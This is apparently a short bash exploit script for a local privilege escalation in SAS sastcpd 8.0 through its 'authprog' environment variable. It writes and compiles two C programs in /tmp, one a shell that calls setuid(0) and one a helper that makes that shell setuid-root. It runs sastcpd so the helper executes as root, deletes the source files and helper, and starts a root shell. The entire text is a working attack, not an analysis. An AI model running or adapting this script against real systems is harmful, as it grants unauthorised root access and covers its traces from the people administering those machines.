#!/bin/bash
# sastcpd 8.0 'authprog' vulnerability.
# rpc <rpc@unholy.net> || <h@ckz.org>
# Thanks sharefuzz!

cat <<EOT >/tmp/hesh.c
int
main(void)
{
	setuid(0);
	setgid(0);
	execl("/bin/ksh", "ksh", (char *)0);
}
EOT

cat <<EOT >/tmp/heh.c
int
main(void)
{
	setuid(0);
	setgid(0);
	system("chown 0:0 /tmp/hesh");
	system("chmod 4755 /tmp/hesh");
	return 0;
}
EOT

gcc -o /tmp/heh /tmp/heh.c
gcc -o /tmp/hesh /tmp/hesh.c

export authprog=/tmp/heh
/path/to/sas/utilities/bin/sastcpd

sleep 1
rm /tmp/he*.c
rm /tmp/heh
/tmp/hesh